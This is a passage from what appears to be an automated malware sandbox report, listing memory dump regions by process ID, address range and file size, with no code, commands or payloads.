                                                                                                                                    • memory/3968-274-0x0000000005720000-0x0000000005721000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3968-257-0x0000000005710000-0x0000000005711000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4144-749-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4244-384-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4252-251-0x0000000000402DC6-mapping.dmp
                                                                                                                                    • memory/4252-245-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4292-291-0x0000000000630000-0x0000000000631000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4292-280-0x000000000041A17E-mapping.dmp
                                                                                                                                    • memory/4292-253-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      128KB

                                                                                                                                    • memory/4292-288-0x0000000000630000-0x0000000000631000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4292-294-0x0000000000400000-0x0000000000401000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4292-323-0x0000000008E30000-0x0000000009436000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      6.0MB

                                                                                                                                    • memory/4292-284-0x0000000000630000-0x0000000000631000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4364-295-0x0000000000020000-0x0000000000021000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4364-292-0x0000000000020000-0x0000000000021000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4364-301-0x0000000000610000-0x0000000000611000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4364-286-0x0000000000628EE6-mapping.dmp
                                                                                                                                    • memory/4364-289-0x0000000000020000-0x0000000000021000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4364-262-0x0000000000610000-0x0000000000630000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      128KB

                                                                                                                                    • memory/4364-329-0x0000000008810000-0x0000000008E16000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      6.0MB

                                                                                                                                    • memory/4416-401-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4436-693-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4552-432-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4604-285-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4628-419-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4724-716-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4764-363-0x0000019F366F3000-0x0000019F366F5000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4764-296-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4764-351-0x0000019F366F0000-0x0000019F366F2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4900-306-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4900-356-0x000002093A710000-0x000002093A712000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4900-367-0x000002093A713000-0x000002093A715000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4932-540-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4980-315-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4980-433-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5052-322-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5092-325-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5136-745-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5176-451-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5188-452-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5268-545-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5304-460-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5308-712-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5328-552-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5424-631-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5428-690-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5464-471-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5532-687-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5724-647-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5764-494-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5776-699-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5800-507-0x0000000000402998-mapping.dmp
                                                                                                                                    • memory/5904-510-0x0000000000000000-mapping.dmp